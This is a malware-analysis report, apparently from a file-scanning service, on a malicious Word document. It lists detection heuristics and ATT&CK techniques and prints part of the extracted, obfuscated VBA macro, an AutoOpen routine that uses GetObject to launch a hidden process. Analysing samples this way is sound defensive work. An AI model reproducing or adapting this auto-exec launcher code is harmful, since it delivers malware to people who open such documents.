MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains legacy WordBasic auto-exec markers and a VBA AutoOpen macro that utilizes the GetObject function, indicating a malicious document designed to execute a payload. The ClamAV detection name further supports its malicious nature. No specific family could be identified.
Heuristics 7
-
ClamAV: Doc.Malware.Sagent-6902288-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6902288-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14538 bytes |
SHA-256: 371ea7f9b110ac7ea13d3c8c243730b6e649c68afb39bffef3e37c8daa8332eb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zBBAAw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "tAZQ_B"
Attribute VB_Base = "0{635A0618-116F-42DC-81B5-3D0498827A3E}{EC4DE146-1DC1-4C0D-81EE-DAD1FE0514C1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "nUQUBD"
Sub autoopen()
On Error Resume Next
If HBAw_Q4A = TGABUoUA Then
dcABAAx = 720773148 * Hex(573673709) / 60407271 + Sqr(978585091) * 916843779 / CInt(945231407) * (882288782 * 418057296)
BACwAU = (866185332 - Chr(lAGBQ_) / HAkA1BZ / 881700869 + z_ABAU / Fix(554426551 + Log(KkU1B4A * Sgn(914323785) + l1Zo_A / CSng(254300688))))
End If
If wD_QBU = S1UAkA Then
TDocAXU = 99659485 * Hex(20058333) / 739469662 + Sqr(932776801) * 553076985 / CInt(159002522) * (844528018 * 806634912)
nGGABwA = (652722581 - Chr(UxQDwCQ) / VkAQDU / 529044965 + jCZ_ADD / Fix(654645913 + Log(bBBAUA * Sgn(307111307) + iU44wZ / CSng(869714904))))
End If
If vABxAcXA = AADUZcA Then
BD_4DAUc = 236890668 * Hex(281483848) / 980791537 + Sqr(484035143) * 132576297 / CInt(161533978) * (334443729 * 615884484)
PAAAAQA = (555775054 - Chr(pD1AAC) / WAQBocC / 778485193 + toAQGDAk / Fix(489830330 + Log(zQZDwX * Sgn(165771220) + WXQcXD / CSng(836112643))))
End If
Set wCGxUxB = GetObject(tAZQ_B.UAABUZA)
If vwAxAk = fCxDcA Then
txAZAA = 680722426 * Hex(831329719) / 788319246 + Sqr(210643544) * 629989943 / CInt(942570148) * (30160108 * 125474389)
zBBoGXA = (583751228 - Chr(QA_AC1) / NABkxB / 545360112 + C_AA_D / Fix(466911424 + Log(zQAUBBw * Sgn(946967472) + TDAAAA / CSng(858360468))))
End If
If YAA_k1C_ = GwDGUC Then
XACAAUAA = 79920443 * Hex(188534406) / 647757044 + Sqr(538919117) * 341250610 / CInt(615846956) * (335755752 * 273911447)
Gc4AQZ = (969397979 - Chr(IcABAAAA) / KQAA1w / 756045161 + tZoAAU / Fix(833120137 + Log(BA_1AA * Sgn(879168603) + jZ1AAU / CSng(262616047))))
End If
wCGxUxB.ShowWindow = 667434 - 667434
If wZxBxA = uwD4Uxc Then
RoQ1UA = 935210567 * Hex(786963101) / 962829557 + Sqr(656993655) * 188174667 / CInt(467828876) * (245010151 * 755906919)
pwBcAAB_ = (960241938 - Chr(bDQ_AA) / ZCcwoDAA / 991163281 + h_AQoA / Fix(153933426 + Log(bxAAx_ * Sgn(406673217) + KxGAQDA / CSng(807236495))))
End If
If LAADwww = WBBAkCU Then
GwAQCBw = 84963699 * Hex(866927520) / 191231961 + Sqr(327337088) * 19461144 / CInt(582692977) * (954043387 * 10320805)
f4DQAAA = (746725079 - Chr(lXQGAB) / iCUU1B / 122067907 + kDB4AX / Fix(477149810 + Log(LBA_oQ * Sgn(953599257) + tAZG_CC / CSng(428401662))))
End If
If vXx_XAZ = tUUAADw Then
dUDADBAA = 930209051 * Hex(82527598) / 907534685 + Sqr(451648126) * 324177419 / CInt(149392085) * (49429930 * 756405424)
qCAAkUA = (278038076 - Chr(ZUCUBwDX) / rAGUcA / 570098903 + dAoUAUB / Fix(294503861 + Log(wcDAD1Q * Sgn(138655485) + GABUQUAA / CSng(226354254))))
End If
GetObject(tAZQ_B.FCUAXBA). _
Create# jUBUAxkx + tAZQ_B.NU_cwDA4 + kBDXAABk + tAZQ_B.IxocAABX + DXAQ_A + tAZQ_B.BABDDQDD + n1AwAA, iUGQxZo, wCGxUxB, NA4cAUk
If HXAAAUAA = GoxAQA1 Then
LA1AXo = 344603657 * Hex(604161073) / 857313564 + Sqr(266471008) * 511869992 / CInt(77334159) * (770356485 * 269241467)
JUAkD1G = (83109844 - Chr(XA_kGA) / XcooCAAD / 56842516 + RDADQDD / Fix(219749515 + Log(wkX_AAQA * Sgn(720521005) + LxAGZ1 / CSng(731589832))))
End If
If O4AAoBAx = RAAxC4A Then
MA_BAcA = 149530676 * Hex(930368712) / 950885847 + Sqr(248529490) * 847847449 / CInt(435290086) * (251116524 * 775834819)
fABAXAAC = (977898552 - Chr(mUCGxUc) / mZAAAkAA / 814876213 + BCcxcAAA / Fix(515372193 + Log(RAAUwxBB * Sgn(734246969) + LXkAAA / CSng(84019171))))
End If
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.